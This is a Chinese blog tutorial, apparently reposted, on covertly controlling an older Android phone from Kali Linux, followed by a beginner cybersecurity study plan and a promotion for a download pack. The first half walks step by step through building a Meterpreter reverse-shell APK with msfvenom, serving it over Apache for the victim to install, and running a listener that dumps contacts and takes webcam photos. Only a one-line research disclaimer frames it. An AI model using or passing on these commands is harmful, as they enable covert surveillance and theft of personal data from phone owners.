控制安卓手機(jī)拍照，查看定位，獲取通信錄

• 引言
• 準(zhǔn)備工作
• • 1. kali、手機(jī)
  • 2.戴上眼睛注意別敲錯(cuò)命令，復(fù)制的時(shí)候注意看！
• 開(kāi)始了！??！
• • First
  • Second

引言

** 大家好，我是Zues,今天我來(lái)教會(huì)大家一個(gè)入侵安卓手機(jī)控制手機(jī)拍照，查看定位，獲取通信錄，查看手機(jī)內(nèi)容。 本作品只適用于老版本安卓，文章只作為研討技術(shù)，不得非法使用
首先準(zhǔn)備工具 **

準(zhǔn)備工作

1. kali、手機(jī)

只需要大家準(zhǔn)備kali操作系統(tǒng)以及一部手機(jī)就好。若是大家做過(guò)程中遇到問(wèn)題，歡迎留言交流

2.戴上眼睛注意別敲錯(cuò)命令，復(fù)制的時(shí)候注意看！

開(kāi)始了?。?！

First

1. 打開(kāi)kali 進(jìn)入終端：
2. 第一生成宿主程序Test.apk

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.46 LPORT=8888 R > Test.apk

成功后如截圖所示：

注意 LHOST是你自己的kali的ip怎么查看自己kali的是以下命令 端口LPRT你自己寫(xiě)：

ifconfig

2.將其移動(dòng)到apache2服務(wù)器目錄下并啟動(dòng)apache2服務(wù)器

cp Test.apk /var/www/html
service apache2 start

成功后如截圖所示：

注意 需要管理員root下 否則輸入sudo cp Test.apk /var/www/html 輸入密碼的時(shí)候不會(huì)回顯：

sudo cp Test.apk /var/www/html

Second

如果你是第一次使用apache2服務(wù)器，則需要修改文件

vi /var/www/html/index.html

找到以下圖片需要增加一行代碼，紅色框框出來(lái)了別改錯(cuò)否則回去重新看一下。
增加一行時(shí)可以使用 i 切換到輸入狀態(tài)，否則你是寫(xiě)不上東西的，輸入錯(cuò)了，可以輸入**:q!不保存退出，輸對(duì)了保存退出時(shí)同樣的:wq**保存并退出；

這時(shí)候手機(jī)輸入你kali的ip就能訪問(wèn)下載這個(gè)apk文件了。

下載好在手機(jī)上安裝，要是訪問(wèn)不了，請(qǐng)?jiān)谠u(píng)論區(qū)聯(lián)系我?。。?br> 接下來(lái)安裝好不用打開(kāi)，再kali上設(shè)置監(jiān)聽(tīng)：

輸入msfconsole

msfconsole

然后繼續(xù)
設(shè)置監(jiān)聽(tīng)

use multi/handlerr

設(shè)置載荷 和之前一樣，別弄錯(cuò)了

set payload android/meterpreter/reverse_tcp

show options

查看到需要設(shè)置以下參數(shù)

set LHOST 10.0.0.46
set LPORT 8888

和你ip一樣，端口和之前一樣

輸入run執(zhí)行起來(lái)

首先查看系統(tǒng)信息

再查看安裝app文件

查看手機(jī)通信錄
dump_contacts

查看手機(jī)拍張照
webcam_snap

接下來(lái)我將給各位同學(xué)劃分一張學(xué)習(xí)計(jì)劃表！

學(xué)習(xí)計(jì)劃

那么問(wèn)題又來(lái)了，作為萌新小白，我應(yīng)該先學(xué)什么，再學(xué)什么？
既然你都問(wèn)的這么直白了，我就告訴你，零基礎(chǔ)應(yīng)該從什么開(kāi)始學(xué)起：

階段一：初級(jí)網(wǎng)絡(luò)安全工程師

接下來(lái)我將給大家安排一個(gè)為期1個(gè)月的網(wǎng)絡(luò)安全初級(jí)計(jì)劃，當(dāng)你學(xué)完后，你基本可以從事一份網(wǎng)絡(luò)安全相關(guān)的工作，比如滲透測(cè)試、Web滲透、安全服務(wù)、安全分析等崗位；其中，如果你等保模塊學(xué)的好，還可以從事等保工程師。

綜合薪資區(qū)間6k~15k

1、網(wǎng)絡(luò)安全理論知識(shí)（2天）
①了解行業(yè)相關(guān)背景，前景，確定發(fā)展方向。
②學(xué)習(xí)網(wǎng)絡(luò)安全相關(guān)法律法規(guī)。
③網(wǎng)絡(luò)安全運(yùn)營(yíng)的概念。
④等保簡(jiǎn)介、等保規(guī)定、流程和規(guī)范。（非常重要）

2、滲透測(cè)試基礎(chǔ)（1周）
①滲透測(cè)試的流程、分類(lèi)、標(biāo)準(zhǔn)
②信息收集技術(shù)：主動(dòng)/被動(dòng)信息搜集、Nmap工具、Google Hacking
③漏洞掃描、漏洞利用、原理，利用方法、工具（MSF）、繞過(guò)IDS和反病毒偵察
④主機(jī)攻防演練：MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系統(tǒng)基礎(chǔ)（1周）
①Windows系統(tǒng)常見(jiàn)功能和命令
②Kali Linux系統(tǒng)常見(jiàn)功能和命令
③操作系統(tǒng)安全（系統(tǒng)入侵排查/系統(tǒng)加固基礎(chǔ)）

4、計(jì)算機(jī)網(wǎng)絡(luò)基礎(chǔ)（1周）
①計(jì)算機(jī)網(wǎng)絡(luò)基礎(chǔ)、協(xié)議和架構(gòu)
②網(wǎng)絡(luò)通信原理、OSI模型、數(shù)據(jù)轉(zhuǎn)發(fā)流程
③常見(jiàn)協(xié)議解析（HTTP、TCP/IP、ARP等）
④網(wǎng)絡(luò)攻擊技術(shù)與網(wǎng)絡(luò)安全防御技術(shù)
⑤Web漏洞原理與防御：主動(dòng)/被動(dòng)攻擊、DDOS攻擊、CVE漏洞復(fù)現(xiàn)

5、數(shù)據(jù)庫(kù)基礎(chǔ)操作（2天）
①數(shù)據(jù)庫(kù)基礎(chǔ)
②SQL語(yǔ)言基礎(chǔ)
③數(shù)據(jù)庫(kù)安全加固

6、Web滲透（1周）
①HTML、CSS和JavaScript簡(jiǎn)介
②OWASP Top10
③Web漏洞掃描工具
④Web滲透工具：Nmap、BurpSuite、SQLMap、其他（菜刀、漏掃等）

那么，到此為止，已經(jīng)耗時(shí)1個(gè)月左右。你已經(jīng)成功成為了一名“腳本小子”。那么你還想接著往下探索嗎？

階段二：中級(jí)or高級(jí)網(wǎng)絡(luò)安全工程師（看自己能力）

綜合薪資區(qū)間15k~30k

7、腳本編程學(xué)習(xí)（4周）
在網(wǎng)絡(luò)安全領(lǐng)域。是否具備編程能力是“腳本小子”和真正網(wǎng)絡(luò)安全工程師的本質(zhì)區(qū)別。在實(shí)際的滲透測(cè)試過(guò)程中，面對(duì)復(fù)雜多變的網(wǎng)絡(luò)環(huán)境，當(dāng)常用工具不能滿足實(shí)際需求的時(shí)候，往往需要對(duì)現(xiàn)有工具進(jìn)行擴(kuò)展，或者編寫(xiě)符合我們要求的工具、自動(dòng)化腳本，這個(gè)時(shí)候就需要具備一定的編程能力。在分秒必爭(zhēng)的CTF競(jìng)賽中，想要高效地使用自制的腳本工具來(lái)實(shí)現(xiàn)各種目的，更是需要擁有編程能力。

零基礎(chǔ)入門(mén)的同學(xué)，我建議選擇腳本語(yǔ)言Python/PHP/Go/Java中的一種，對(duì)常用庫(kù)進(jìn)行編程學(xué)習(xí)
搭建開(kāi)發(fā)環(huán)境和選擇IDE，PHP環(huán)境推薦Wamp和XAMPP，IDE強(qiáng)烈推薦Sublime；

Python編程學(xué)習(xí)，學(xué)習(xí)內(nèi)容包含：語(yǔ)法、正則、文件、 網(wǎng)絡(luò)、多線程等常用庫(kù)，推薦《Python核心編程》，沒(méi)必要看完

用Python編寫(xiě)漏洞的exp,然后寫(xiě)一個(gè)簡(jiǎn)單的網(wǎng)絡(luò)爬蟲(chóng)

PHP基本語(yǔ)法學(xué)習(xí)并書(shū)寫(xiě)一個(gè)簡(jiǎn)單的博客系統(tǒng)

熟悉MVC架構(gòu)，并試著學(xué)習(xí)一個(gè)PHP框架或者Python框架 (可選)

了解Bootstrap的布局或者CSS。

階段三：頂級(jí)網(wǎng)絡(luò)安全工程師

如果你對(duì)網(wǎng)絡(luò)安全入門(mén)感興趣，那么你需要的話可以點(diǎn)擊這里??網(wǎng)絡(luò)安全重磅福利：入門(mén)&進(jìn)階全套282G學(xué)習(xí)資源包免費(fèi)分享！

學(xué)習(xí)資料分享

當(dāng)然，只給予計(jì)劃不給予學(xué)習(xí)資料的行為無(wú)異于耍流氓，這里給大家整理了一份【282G】的網(wǎng)絡(luò)安全工程師從入門(mén)到精通的學(xué)習(xí)資料包，可點(diǎn)擊下方二維碼鏈接領(lǐng)取哦。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-831022.html

到了這里，關(guān)于kali 使用后臺(tái)進(jìn)行手機(jī)拍照，查看定位，獲取信息，(通訊錄等操作)的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！